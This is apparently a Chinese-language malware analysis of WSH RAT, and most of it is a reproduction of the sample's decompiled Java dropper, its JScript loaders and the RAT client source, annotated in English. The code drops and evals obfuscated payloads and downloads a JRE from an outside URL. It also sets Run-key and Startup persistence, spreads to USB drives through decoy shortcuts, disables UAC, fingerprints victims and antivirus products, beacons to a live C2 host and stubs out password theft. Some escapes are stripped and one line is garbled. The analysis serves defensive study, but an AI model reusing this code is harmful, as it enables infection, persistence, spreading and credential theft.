WSA RAT是2019年6月发布的一款新型RAT恶意软件,基于Java,wscript,具有盗取受害者敏感信息,控制计算机,上传下载文件以及执行特定命令等恶意行为。
样本信息
样本名称:Bestellung.jar
样本md5:95014878404D850502BA546A0FEB3CFC
来源:app.any.run
分析过程
jadx打开,得到主函数
package dcrioymvqp;
import java.io.ByteArrayOutputStream;
import java.io.File;
/**
 * Dropper entry point of the sample (decompiled; class and method names are
 * obfuscated). It unpacks the embedded resource to a .js file in the user's
 * home directory and launches it with wscript. The code is reproduced as
 * decompiled; only analyst annotations were added.
 */
public class Melrjerltjy {
    public static void main(String[] strArr) {
        try {
            // Drop location: <user.home>/lrefocyhfz.js, stored as USA[0] of the helper.
            Mgpmluovxer mgpmluovxer = new Mgpmluovxer(new File(System.getProperty("user.home") + File.separator + "lrefocyhfz.js"));
            // USA[1] initially holds the embedded payload ("resources/ycfysuwhlz" inside the jar).
            mgpmluovxer.USA[1] = Melrjerltjy.class.getResourceAsStream("resources/ycfysuwhlz");
            // The loop body is a decoy; the real work happens in the loop condition.
            // bringStrVal() always returns 2, so it is evaluated three times:
            // i=0 buffers the resource in memory, i=1 writes the file and swaps
            // USA[1] for a Runtime, i=2 is a no-op that ends the loop.
            for (int i = 0; i < mgpmluovxer.bringStrVal(new ByteArrayOutputStream()); i++) {
                System.out.println("Hello world");
            }
            // By now USA[1] is Runtime.getRuntime() and USA[0] is the absolute path of the
            // dropped file, i.e. this runs: wscript "<home>/lrefocyhfz.js".
            ((Runtime) mgpmluovxer.USA[1]).exec(new String[]{"wscript", (String) mgpmluovxer.USA[0]});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
首先初始化了Mgpmluovxer对象,然后释放恶意js脚本,最后使用wscript执行释放的脚本
接下来查看Mgpmluovxer类
package dcrioymvqp;
import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.InputStream;
/* compiled from: Melrjerltjy */
/**
 * Helper used by the dropper's main(). It is a small three-stage state
 * machine: stage 0 reads the payload stream into memory, stage 1 writes it to
 * disk and prepares a Runtime for the wscript launch, stage 2 does nothing.
 * Decompiled code reproduced as-is; annotations only.
 */
class Mgpmluovxer {
    // USA[0]: the drop File, replaced by its absolute path (String) after stage 1.
    // USA[1]: payload InputStream -> byte[] (after stage 0) -> Runtime (after stage 1).
    public Object[] USA;
    // Stage counter consumed by bringStrVal(): 0 = read, 1 = write + prepare exec, 2 = done.
    private int i = 0;
    // The constructor only initialises the object array.
    Mgpmluovxer(File file) {
        this.USA = new Object[]{file, null};
    }
    /**
     * Reads up to 1024 bytes from the stream.
     *
     * @return {Integer bytesRead (or -1 at end of stream), byte[1024] buffer}
     */
    private Object[] rRead(InputStream inputStream) throws Exception {
        byte[] bArr = new byte[1024];
        return new Object[]{Integer.valueOf(inputStream.read(bArr, 0, bArr.length)), bArr};
    }
    /**
     * Stage 1: writes the buffered payload (USA[1]) to the drop file (USA[0]),
     * then rewires the array so main() can call exec() on it.
     * The output stream is not closed on an exception path (no try/finally).
     */
    private void tacha() throws Exception {
        FileOutputStream fileOutputStream = new FileOutputStream((File) this.USA[0]);
        fileOutputStream.write((byte[]) this.USA[1]);
        fileOutputStream.flush();
        fileOutputStream.close();
        // From here on USA[0] is the String path passed to wscript ...
        this.USA[0] = ((File) this.USA[0]).getAbsolutePath();
        // ... and USA[1] is the Runtime used to launch it.
        this.USA[1] = Runtime.getRuntime();
        this.i = 2;
    }
    /**
     * Advances the state machine by one stage and always returns 2; the caller
     * uses the return value only as a loop bound.
     *
     * Stage 0 copies the whole resource stream (USA[1]) into the supplied
     * buffer, closes the stream and stores the bytes in USA[1].
     * Stage 1 delegates to tacha(). Any other stage returns immediately.
     *
     * @param byteArrayOutputStream scratch buffer; only used in stage 0
     * @return always 2
     */
    public int bringStrVal(ByteArrayOutputStream byteArrayOutputStream) throws Exception {
        if (this.i == 0) {
            InputStream inputStream = (InputStream) this.USA[1];
            while (true) {
                Object[] rRead = rRead(inputStream);
                if (((Integer) rRead[0]).intValue() == -1) {
                    inputStream.close();
                    this.USA[1] = byteArrayOutputStream.toByteArray();
                    this.i = 1;
                    return 2;
                }
                byteArrayOutputStream.write((byte[]) rRead[1], 0, ((Integer) rRead[0]).intValue());
            }
        } else if (this.i != 1) {
            return 2;
        } else {
            tacha();
            return 2;
        }
    }
}
构造函数只是初始化了一个Object数组,但是另一个对象是main函数中赋值的,是资源文件。
bringStrVal首先把字符串转化成数字,以判断是否结尾。再把数字转换为字符串,写入数组
使用自身的i属性控制程序流程,读取脚本之后写入到USA[0]指向的文件内,并将USA[1]转化为Java运行时虚拟机。根据主函数分析,目标文件为home文件夹下的refocyhfz.js
refocyhfz.js分析
// Embedded payload: base64 text in which every "m" was replaced by "#!%"
// (tsnkaDE restores it), plus the MSXML dataType used to decode it.
// The string is truncated on the page.
var obaAdedapo = ["d#!%FyIGxvb#!%dUZXh0MSA9ICJkbUZ5S...Cn0=", "bin.base64"];
// Loads the payload into an XML DOM element typed as bin.base64, so that the
// element's nodeTypedValue yields the decoded bytes.
// noSign.O[0] is the DOM element, noSign.I the RegExp matching "#!%" (replaced by "m").
// Returns a one-element array holding a function that returns noSign.O.
function tsnkaDE(noSign){
    noSign.O[0].dataType = obaAdedapo[1];
    noSign.O[0].text = obaAdedapo[0].replace(noSign.I, "m");
    return Array(function(){return noSign.O;});
}
// One-element array wrapping WSH.CreateObject; ume22[0]("ProgID") is the COM
// factory used by the rest of the loader.
var ume22 = Array(function(txt){
    return WSH.CreateObject(txt);
});
// Probes a ProgID that is not expected to exist. CreateObject throws, the
// exception is swallowed and null is returned, which steers jiePAmE into its
// Adodb.Stream branch.
function kubernetes(){
    try{
        return ume22[0]("Loki.Happy.Birthday");
    }catch(er){
        return null;
    }
}
// Returns [modELN0[0].getString(modELN0[1]), modELN2]. Only reached from the
// else-branch of jiePAmE, i.e. when kubernetes() returns non-null, so it is a
// dead path in practice.
function faulty(modELN0, modELN1, modELN2){
    return Array(modELN0[0].getString((modELN0[1])), modELN2);
}
//
// Decodes the embedded payload and executes it.
// modELN  = ["#!%", "g"] (RegExp source and flags), modELN1 = [Microsoft.XmlDom].
// Control flow relies on an intentional exception: after decoding, ntv is set
// to null and ntv.Read() throws, so the catch block is where the decoded
// script is actually run (modELN[1] is eval, modELN[0] the decoded text).
function jiePAmE(modELN, modELN1, modELN2){
    try{
        var ntv = tsnkaDE({O: Array(modELN1[0].createElement("pay")), I: new RegExp(modELN[0], modELN[1])});
        if(kubernetes() == null){
            // Binary stream (Type=1) <- decoded bytes, then re-read as text (Type=2) in us-ascii.
            var sBABi = ume22[0]("Adodb.Stream");
            sBABi.Type = 1;
            sBABi.Open();
            sBABi.Write(ntv[0]()[0].nodeTypedValue);
            sBABi.Position = 0;
            sBABi.Type = (3-1);
            sBABi.CharSet = "us-ascii";
            modELN = Array(sBABi.ReadText(), eval);
            ntv = null;
        }else{
            ntv = faulty([kubernetes(), ntv.item().nodeTypedValue], null, eval);
        }
        // ntv is null here on the normal path: this throws on purpose.
        modELN2 = ntv.Read();
    }catch(err){
        // Equivalent to eval(decodedScript).
        modELN[1]({j:[modELN[0]]}.j[0]);
    }
}
// Entry point: the RegExp parts ("#!%" with flag "g") and the XML DOM used for decoding.
jiePAmE(Array("#!%", "g"), Array(ume22[0]("Microsoft.XmlDom")));
首先把obaAdedapo中的#!%都替换为m,然后使用base64解密。解密后是一个脚本。
由于不存在Loki.Happy.Birthday类,所以执行第一个if内的语句,但是ntv是null,执行catch中的语句,catch中实际上调用了eval函数,即实现了执行脚本
接下来分析exec的代码
// Second-stage loader (the script decoded by refocyhfz.js). Two embedded base64
// payloads are decoded through MSXML: the first is written to
// %appdata%\hliqmPFawG.js and run with WScript.Shell; the second is written
// under a random .txt name and launched with javaw -jar.
// NOTE(review): backslashes inside string literals and the \" quote escapes
// appear to have been stripped when the page was extracted (e.g. "\hliqmPFawG.js",
// """ + stubpath1 + """); the listing is reproduced as printed.
var longText1="...";
var wshShell1 = WScript.CreateObject("WScript.Shell");
var appdatadir1 = wshShell1.ExpandEnvironmentStrings("%appdata%");
var stubpath1 = appdatadir1 + "\hliqmPFawG.js";
var decoded1 = decodeBase64(longText1);
writeBytes(stubpath1, decoded1);
wshShell1.run(""" + stubpath1 + """);
wshShell1 = null;
var longText="...";
// Second payload: "#!%" stands in for "A" in the base64 text.
var re = new RegExp("#!%", "g");
longText = longText.replace(re, "A");
var wshShell = WScript.CreateObject("WScript.Shell");
var tempdir = wshShell.ExpandEnvironmentStrings("%temp%");
var appdatadir = wshShell.ExpandEnvironmentStrings("%appdata%");
// Random file name: up to 10 lowercase letters taken from Math.random() in base 36.
var r = Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 10);
var stubpath = appdatadir + "\" + r + ".txt"
var decoded = decodeBase64(longText);
writeBytes(stubpath, decoded);
var fso = WScript.CreateObject("Scripting.FileSystemObject");
var text = "";
// Locate an installed JRE: 64-bit OS with 32-bit Java first (Wow6432Node) ...
try {
    text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\CurrentVersion");
    text = wshShell.RegRead("HKLM\SOFTWARE\Wow6432Node\JavaSoft\Java Runtime Environment\" + text + "\JavaHome");
} catch (err) {}
// ... then the native JavaSoft key; either way javaw.exe is appended.
try {
    if (text == "") {
        text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion");
        text = wshShell.RegRead("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\" + text + "\JavaHome");
        if (text != "") {
            text = text + "\bin\javaw.exe";
        }
    } else {
        text = text + "\bin\javaw.exe";
    }
} catch (err) {}
// Run the dropped .txt as a jar with the located javaw, or fetch a JRE first.
// The Run-key persistence line is commented out here; GrabJreFromNet() writes it.
try {
    if (text != "") {
        //wshShell.RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """ + text + "" -jar "" + stubpath + """, "REG_SZ");
        wshShell.run(""" + text + """ + " -jar " + """ + stubpath + """);
    } else {
        GrabJreFromNet();
    }
} catch (err) {}
// Fallback when no JRE is registered: downloads jre7.zip from the URL below,
// unpacks it to %appdata%\jre7, registers it under HKLM as JRE "1.8", adds a
// Run-key entry named "ntfsmgr" that launches the dropped jar, and starts it.
// Observables for defenders: the download URL, the JavaSoft key writes and the
// ntfsmgr Run value.
function GrabJreFromNet() {
    // Retries forever, sleeping 5 s after each failed attempt.
    do {
        try {
            var xHttp = WScript.CreateObject("Microsoft.XMLHTTP");
            var bStrm = WScript.CreateObject("Adodb.Stream");
            xHttp.open("GET", "https://posta.co.tz/goz/jre7.zip", false);
            xHttp.send();
            bStrm.Type = 1;
            bStrm.open();
            bStrm.write(xHttp.responseBody);
            // Garbled as printed; presumably savetofile(appdatadir + "\\jre.zip", 2).
            bStrm.savetofile() + "\jre.zip", 2);
            break;
        } catch (err) {
            WScript.Sleep(5000);
        }
    } while (true);
    UnZip(appdatadir + "\jre.zip", appdatadir + "\jre7");
    wshShell.RegWrite("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\CurrentVersion", "1.8", "REG_SZ");
    wshShell.RegWrite("HKLM\SOFTWARE\JavaSoft\Java Runtime Environment\1.8\JavaHome", appdatadir + "\jre7", "REG_SZ");
    // Persistence: HKCU Run value "ntfsmgr" -> javaw.exe -jar <stubpath>.
    wshShell.RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr", """ + appdatadir + "\jre7\bin\javaw.exe" -jar " + """ + stubpath & """, "REG_SZ");
    wshShell.run(""" + appdatadir + "\jre7\bin\javaw.exe" -jar " + """ + stubpath + """);
}
// Base64 decode via MSXML: an element typed bin.base64 exposes the decoded
// bytes through nodeTypedValue.
function decodeBase64(base64) {
    var DM = WScript.CreateObject("Microsoft.XMLDOM");
    var EL = DM.createElement("tmp");
    EL.dataType = "bin.base64";
    EL.text = base64;
    return EL.nodeTypedValue;
}
// Writes a byte array to disk through an ADODB.Stream (Type 1 = binary);
// SaveToFile option 2 overwrites an existing file.
function writeBytes(file, bytes) {
    var binaryStream = WScript.CreateObject("ADODB.Stream");
    binaryStream.Type = 1;
    binaryStream.Open();
    binaryStream.Write(bytes);
    binaryStream.SaveToFile(file, 2);
}
// Extracts a .zip with the Shell.Application NameSpace/copyHere API (no external
// tool needed). Uses the global fso. Existing files in the target folder are
// deleted first. The loop variable i is assigned without var, i.e. it is global.
function UnZip(zipfile, ExtractTo) {
    if (fso.GetExtensionName(zipfile) == "zip") {
        if (!fso.FolderExists(ExtractTo)) {
            fso.CreateFolder(ExtractTo);
        }
        var objShell = WScript.CreateObject("Shell.Application");
        var destination = objShell.NameSpace(ExtractTo);
        var zip_content = objShell.NameSpace(zipfile).Items();
        for (i = 0; i < zip_content.Count; i++) {
            if (fso.FileExists(fso.Buildpath(ExtractTo, zip_content.item(i).name) + "." + fso.getExtensionName(zip_content.item(i).path))) {
                fso.DeleteFile(fso.Buildpath(ExtractTo, zip_content.item(i).name) + "." + fso.getExtensionName(zip_content.item(i).path));
            }
            // 20 = 4 (no progress dialog) + 16 (answer "Yes to All"), so the copy is silent.
            destination.copyHere(zip_content.item(i), 20);
        }
    }
}
先解密一个base64串,然后保存为hliqmPFawG.js,执行里面的js脚本。然后使用java执行脚本
先解码了longText,然后从注册表中读取Java的路径。32位和64位均支持,如果没有Java路径,则会从https://posta.co.tz/goz/jre7.zip 下载jre7到appdata目录并解压。最后执行base64串包含的jar文件。
其中,hliqmPFawG.js和refocyhfz.js类似,都是一个加载器,逻辑类似。其解密和执行的js脚本如下
//<[ recoder : kognito (c) skype : live:unknown.sales64 ]>
//=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
// WSH RAT client (the script decoded by hliqmPFawG.js). Configuration, global
// objects and the beacon loop; the command handlers live in the functions below.
// NOTE(review): as in the loader above, backslashes in string literals and \"
// escapes look stripped by the page extraction; code reproduced as printed.
// C2 endpoint: every request goes to http://host:port/<command>.
var host = "pluginsrv1.duckdns.org";
var port = 7756;
var installdir = "%appdata%";
// runAsAdmin is false in this sample, so startupElevate() is not called by default.
var runAsAdmin = false;
// Enable the removable-drive .lnk tricks for files and folders (see install()).
var lnkfile = true;
var lnkfolder = true;
if (runAsAdmin == true) {
    startupElevate();
}
// When relaunched with /elevated the script first turns off UAC (see disableSecurity()).
if (WScript.Arguments.Named.Exists("elevated") == true) {
    disableSecurity();
}
//=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
var shellobj = WScript.createObject("wscript.shell");
var filesystemobj = WScript.createObject("scripting.filesystemobject");
var httpobj = WScript.createObject("msxml2.xmlhttp");
//=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
// The installed copy keeps the name the script was launched with.
var installname = WScript.scriptName;
var startup = shellobj.specialFolders("startup") + "\";
installdir = shellobj.ExpandEnvironmentStrings(installdir) + "\";
// Fall back to %temp% if %appdata% does not exist.
if (!filesystemobj.folderExists(installdir)) {
    installdir = shellobj.ExpandEnvironmentStrings("%temp%") + "\";
}
// Field separator used in C2 requests and responses.
var spliter = "|";
var sdkpath = installdir + "wshsdk";
// The chr() sequence spells "python.exe" (112 121 116 104 111 110 46 101 120 101).
var sdkfile = sdkpath + "\" + chr(112) + chr(121) + chr(116) + chr(104) + chr(111) + chr(110) + chr(46) + chr(101) + chr(120) + chr(101);
// Beacon interval in milliseconds.
var sleep = 5000;
var response, cmd, param, oneonce;
var inf = "";
var usbspreading = "";
var startdate = "";
//=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
instance();
// Beacon loop: re-apply persistence/spreading, poll the C2 with "is-ready",
// split the reply on "|" and dispatch on the first field. Errors are swallowed.
while (true) {
    try {
        install();
        response = "";
        response = post("is-ready", "");
        cmd = response.split(spliter);
        switch (cmd[0]) {
            case "disconnect":
                WScript.quit();
                break;
            // A series of control commands (elided on the page).
        }
    } catch (er) {}
    WScript.sleep(sleep);
}
// Asks the C2 ("moz-sdk") for a download URL, fetches it to <installdir>wshsdk.zip,
// unpacks it into sdkpath and reports "SDK+Installed". All failures are silent.
function installsdk() {
    try {
        var sdkurl = post("moz-sdk", "");
        var objhttpdownload = WScript.CreateObject("msxml2.xmlhttp");
        objhttpdownload.open("get", sdkurl, false);
        objhttpdownload.setRequestHeader("cache-control:", "max-age=0");
        objhttpdownload.send();
        if (filesystemobj.fileExists(installdir + "wshsdk.zip")) {
            filesystemobj.deleteFile(installdir + "wshsdk.zip");
        }
        if (objhttpdownload.status == 200) {
            try {
                var objstreamdownload = WScript.CreateObject("adodb.stream");
                objstreamdownload.Type = 1;
                objstreamdownload.Open();
                objstreamdownload.Write(objhttpdownload.responseBody);
                objstreamdownload.SaveToFile(installdir + "wshsdk.zip");
                objstreamdownload.close();
                objstreamdownload = null;
            } catch (ez) {
            }
        }
        if (filesystemobj.fileExists(installdir + "wshsdk.zip")) {
            //unzip the file
            UnZip(installdir + "wshsdk.zip", sdkpath);
            updatestatus("SDK+Installed");
        }
    } catch (err) {}
}
// Called on every beacon iteration. Re-applies persistence via upstart(), then
// handles removable-drive propagation: for each ready drive with drivetype 1
// (removable) and free space it copies the script to the drive root as
// hidden+system (attributes 2+4), hides every non-.lnk file and creates a
// same-name .lnk that runs cmd.exe to start the script and then the original
// file; top-level folders get the same treatment with "start explorer".
// The icon is taken from the file type's DefaultIcon registry entry so the
// shortcut looks like the hidden item.
function install() {
    var lnkobj;
    var filename;
    var foldername;
    var fileicon;
    var foldericon;
    upstart();
    for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
        var drive = dri.item();
        if (drive.isready == true) {
            if (drive.freespace > 0) {
                if (drive.drivetype == 1) {
                    try {
                        filesystemobj.copyFile(WScript.scriptFullName, drive.path + "\" + installname, true);
                        if (filesystemobj.fileExists(drive.path + "\" + installname)) {
                            filesystemobj.getFile(drive.path + "\" + installname).attributes = 2 + 4;
                        }
                    } catch (eiju) {}
                    for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").files); !fi.atEnd(); fi.moveNext()) {
                        try {
                            var file = fi.item();
                            if (lnkfile == false) {
                                break;
                            }
                            // indexOf returns -1 (truthy) when there is no dot, so only a
                            // leading-dot name is skipped here.
                            if (file.name.indexOf(".")) {
                                if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
                                    file.attributes = 2 + 4;
                                    if (file.name.toUpperCase() != installname.toUpperCase()) {
                                        filename = file.name.split(".");
                                        lnkobj = shellobj.createShortcut(drive.path + "\" + filename[0] + ".lnk");
                                        lnkobj.windowStyle = 7;
                                        lnkobj.targetPath = "cmd.exe";
                                        lnkobj.workingDirectory = "";
                                        lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "" "") + "&start " + file.name.replace(new RegExp(" ", "g"), "" "") + "&exit";
                                        try {
                                            fileicon = shellobj.RegRead("HKEY_LOCAL_MACHINE\software\classes\" + shellobj.RegRead("HKEY_LOCAL_MACHINE\software\classes\." + file.name.split(".")[file.name.split(".").length - 1] + "\") + "\defaulticon\");
                                        } catch (eeee) {}
                                        // If RegRead failed fileicon may be undefined and this throws
                                        // into the outer catch, skipping the shortcut for that file.
                                        if (fileicon.indexOf(",") == 0) {
                                            lnkobj.iconLocation = file.path;
                                        } else {
                                            lnkobj.iconLocation = fileicon;
                                        }
                                        lnkobj.save();
                                    }
                                }
                            }
                        } catch (err) {}
                    }
                    for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").subFolders); !fi.atEnd(); fi.moveNext()) {
                        try {
                            var folder = fi.item();
                            if (lnkfolder == false) {
                                break;
                            }
                            folder.attributes = 2 + 4;
                            foldername = folder.name;
                            lnkobj = shellobj.createShortcut(drive.path + "\" + foldername + ".lnk");
                            lnkobj.windowStyle = 7;
                            lnkobj.targetPath = "cmd.exe";
                            lnkobj.workingDirectory = "";
                            lnkobj.arguments = "/c start " + installname.replace(new RegExp(" ", "g"), "" "") + "&start explorer " + folder.name.replace(new RegExp(" ", "g"), "" "") + "&exit";
                            foldericon = shellobj.RegRead("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\");
                            if (foldericon.indexOf(",") == 0) {
                                lnkobj.iconLocation = folder.path;
                            } else {
                                lnkobj.iconLocation = foldericon;
                            }
                            lnkobj.save();
                        } catch (err) {}
                    }
                }
            }
        }
    }
}
// Relaunches the script through ShellExecute with the "runas" verb (UAC
// prompt) and the /elevated switch, then exits the unelevated instance.
// Not reached in this sample because runAsAdmin is false.
function startupElevate() {
    if (WScript.Arguments.Named.Exists("elevated") == false) {
        try {
            WScript.CreateObject("Shell.Application").ShellExecute("wscript.exe", " //B "" + WScript.ScriptFullName + "" /elevated", "", "runas", 1);
        } catch (nn) {}
        WScript.quit();
    }
}
// Turns off UAC through the WMI StdRegProv: 0x80000002 is HKEY_LOCAL_MACHINE,
// EnableLUA=0 disables UAC and ConsentPromptBehaviorAdmin=0 removes the admin
// consent prompt. Only runs when the script was started with /elevated.
// Writes to these two values are a high-signal detection for defenders.
function disableSecurity() {
    if (WScript.Arguments.Named.Exists("elevated") == true) {
        var oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv");
        oReg.SetDwordValue(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", 0);
        oReg.SetDwordValue(0x80000002, "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "ConsentPromptBehaviorAdmin", 0);
        oReg = null;
    }
}
// Removes the artifacts that upstart() and install() create: both Run values,
// the installdir/startup copies and the running script, then on every
// removable drive restores file attributes, deletes the decoy .lnk files and
// the dropped script copy, and unhides the folders. Finally exits.
function uninstall() {
    try {
        var filename;
        var foldername;
        try {
            shellobj.RegDelete("HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" + installname.split(".")[0]);
            shellobj.RegDelete("HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" + installname.split(".")[0]);
        } catch (ei) {}
        try {
            filesystemobj.deleteFile(startup + installname, true);
            filesystemobj.deleteFile(WScript.scriptFullName, true);
        } catch (eej) {}
        for (var dri = new Enumerator(filesystemobj.drives); !dri.atEnd(); dri.moveNext()) {
            var drive = dri.item();
            if (drive.isready == true) {
                if (drive.freespace > 0) {
                    if (drive.drivetype == 1) {
                        for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").files); !fi.atEnd(); fi.moveNext()) {
                            var file = fi.item();
                            try {
                                if (file.name.indexOf(".")) {
                                    if ((file.name.split(".")[file.name.split(".").length - 1]).toLowerCase() != "lnk") {
                                        // Clear hidden/system on the original file ...
                                        file.attributes = 0;
                                        if (file.name.toUpperCase() != installname.toUpperCase()) {
                                            // ... and drop the decoy shortcut created by install().
                                            filename = file.name.split(".");
                                            filesystemobj.deleteFile(drive.path + "\" + filename[0] + ".lnk");
                                        } else {
                                            filesystemobj.deleteFile(drive.path + "\" + file.name);
                                        }
                                    } else {
                                        filesystemobj.deleteFile(file.path);
                                    }
                                }
                            } catch (ex) {}
                        }
                        for (var fi = new Enumerator(filesystemobj.getfolder(drive.path + "\").subFolders); !fi.atEnd(); fi.moveNext()) {
                            var folder = fi.item();
                            folder.attributes = 0;
                        }
                    }
                }
            }
        }
    } catch (err) {}
    WScript.quit();
}
// C2 transport: synchronous HTTP POST to http://host:port/<cmd> with param as
// the body. The victim fingerprint from information() is sent in the
// User-Agent header (note the header name is printed with a trailing colon).
// Returns the response text, or "" on any error.
function post(cmd, param) {
    try {
        httpobj.open("post", "http://" + host + ":" + port + "/" + cmd, false);
        httpobj.setRequestHeader("user-agent:", information());
        httpobj.send(param);
        return httpobj.responseText;
    } catch (err) {
        return "";
    }
}
// Builds and caches (in the global inf) the victim fingerprint sent with every
// request:
//   WSHRAT|<hwid>|<computername>|<username>|<OS caption>|plus|<AV products>|<usbspreading>|JavaScript-v1.6
// Returns "" if anything throws; the fixed "WSHRAT" / "JavaScript-v1.6" tokens
// are a useful User-Agent signature for network detection.
function information() {
    try {
        if (inf == "") {
            inf = hwid() + spliter;
            inf = inf + shellobj.ExpandEnvironmentStrings("%computername%") + spliter;
            inf = inf + shellobj.ExpandEnvironmentStrings("%username%") + spliter;
            // OS name via WMI (first Win32_OperatingSystem row only).
            var root = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2");
            var os = root.ExecQuery("select * from win32_operatingsystem");
            for (var fi = new Enumerator(os); !fi.atEnd(); fi.moveNext()) {
                var osinfo = fi.item();
                inf = inf + osinfo.caption + spliter;
                break;
            }
            inf = inf + "plus" + spliter;
            inf = inf + security() + spliter;
            inf = inf + usbspreading;
            inf = "WSHRAT" + spliter + inf + spliter + "JavaScript-v1.6";
            return inf;
        } else {
            return inf;
        }
    } catch (err) {
        return "";
    }
}
// Persistence. Writes a Run value under both HKCU and HKLM named after the
// script's base name, pointing at wscript.exe //B "<installdir><installname>",
// then copies the script into installdir and into the Startup folder.
// The HKLM write fails silently without admin rights.
function upstart() {
    try {
        try {
            shellobj.RegWrite("HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" + installname.split(".")[0], "wscript.exe //B "" + installdir + installname + """, "REG_SZ");
            shellobj.RegWrite("HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" + installname.split(".")[0], "wscript.exe //B "" + installdir + installname + """, "REG_SZ");
        } catch (ei) {}
        filesystemobj.copyFile(WScript.scriptFullName, installdir + installname, true);
        filesystemobj.copyFile(WScript.scriptFullName, startup + installname, true);
    } catch (err) {}
}
function hwid() {
    // Obtains a hardware ID for the fingerprint (body elided on the page).
}
// Lists installed antivirus products for the fingerprint. Reads the OS version
// via WMI to choose the SecurityCenter2 namespace (version > 6) over
// SecurityCenter, then queries AntiVirusProduct.displayName.
// Returns "nan-av" when nothing is found and undefined if anything throws
// (the catch block falls through without a return).
function security() {
    try {
        var objwmiservice = GetObject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2");
        var colitems = objwmiservice.ExecQuery("select * from win32_operatingsystem", null, 48);
        var versionstr, osversion;
        for (var fi = new Enumerator(colitems); !fi.atEnd(); fi.moveNext()) {
            var objitem = fi.item();
            versionstr = objitem.version.toString().split(".");
        }
        //versionstr = colitems.version.split(".");
        // Builds "<major>.<major><major>..." — the loop appends versionstr[0]
        // instead of versionstr[x], so only the major number matters; eval()
        // turns the string into a number.
        osversion = versionstr[0] + ".";
        for (var x = 1; x < versionstr.length; x++) {
            osversion = osversion + versionstr[0];
        }
        osversion = eval(osversion);
        var sc;
        if (osversion > 6) {
            sc = "securitycenter2";
        } else {
            sc = "securitycenter";
        }
        var objsecuritycenter = GetObject("winmgmts:\\localhost\root\" + sc);
        var colantivirus = objsecuritycenter.ExecQuery("select * from antivirusproduct", "wql", 0);
        var secu = "";
        for (var fi = new Enumerator(colantivirus); !fi.atEnd(); fi.moveNext()) {
            var objantivirus = fi.item();
            secu = secu + objantivirus.displayName + " .";
        }
        if (secu == "") {
            secu = "nan-av";
        }
        return secu;
    } catch (err) {}
}
function getDate() {
    // Returns the current date as a string (body elided on the page).
}
// One-time start-up logic. Records in HKLM\software\<name>\ whether this copy
// was started from a drive root (":\<installname>", i.e. a removable drive
// infected by install()) as "true - <date>" / "false - <date>", applies
// persistence, and if the running file is not the installed copy, starts the
// installed copy and exits. Any error terminates the script.
function instance() {
    try {
        try {
            usbspreading = shellobj.RegRead("HKEY_LOCAL_MACHINE\software\" + installname.split(".")[0] + "\");
        } catch (eee) {}
        if (usbspreading == "") {
            // substr(1) strips the drive letter, leaving ":\<name>" for a root-level launch.
            if (WScript.scriptFullName.substr(1).toLowerCase() == ":\" + installname.toLowerCase()) {
                usbspreading = "true - " + getDate();
                try {
                    shellobj.RegWrite("HKEY_LOCAL_MACHINE\software\" + installname.split(".")[0] + "\", usbspreading, "REG_SZ");
                } catch (eeeee) {}
            } else {
                usbspreading = "false - " + getDate();
                try {
                    shellobj.RegWrite("HKEY_LOCAL_MACHINE\software\" + installname.split(".")[0] + "\", usbspreading, "REG_SZ");
                } catch (eeeee) {}
            }
        }
        upstart();
        // Compare 8.3 short paths so the same file under different spellings matches.
        var scriptfullnameshort = filesystemobj.getFile(WScript.scriptFullName);
        var installfullnameshort = filesystemobj.getFile(installdir + installname);
        if (scriptfullnameshort.shortPath.toLowerCase() != installfullnameshort.shortPath.toLowerCase()) {
            shellobj.run("wscript.exe //B "" + installdir + installname + """);
            WScript.quit();
        }
        // Opens the installed copy for append (mode 8) and never closes it;
        // presumably to keep a handle on the file for the script's lifetime — verify.
        oneonce = filesystemobj.openTextFile(installdir + installname, 8, false);
    } catch (err) {
        WScript.quit();
    }
}
function decode_base64(base64_string) {
    // Base64 decoder (body elided on the page).
}
function decode_pass(retcmd) {
    // Body elided on the page.
}
// Character from char code; used to assemble strings such as "python.exe"
// without writing them literally.
function chr(code) {
    return String.fromCharCode(code);
}
// 8.3 short path of a file.
function gsp(path) {
    return filesystemobj.getFile(path).shortPath;
}
function passgrabber(fileurl, filename, retcmd) {
    // Collects stored passwords from IE, Chrome, Firefox and other browsers (body elided on the page).
}
function UnZip(zipfile, ExtractTo) {
    // Extracts a zip archive (body elided on the page).
}
// Downloads an external credential-dumping tool from fileurl to
// <installdir><filename>, writes a .cfg next to it, runs it with
// " /stext <file>data" to get a text report, copies that report to
// <installdir>wshlogs\recovered_password_email.log, uploads it to the C2 and
// deletes the tool. Defenders: the wshlogs folder, the "/stext" command line
// and the taskkill calls are the observables.
// NOTE(review): the "n" separators in the cfg string are most likely "\n" with
// the backslash lost in extraction.
function passgrabber2(fileurl, filename, retcmd) {
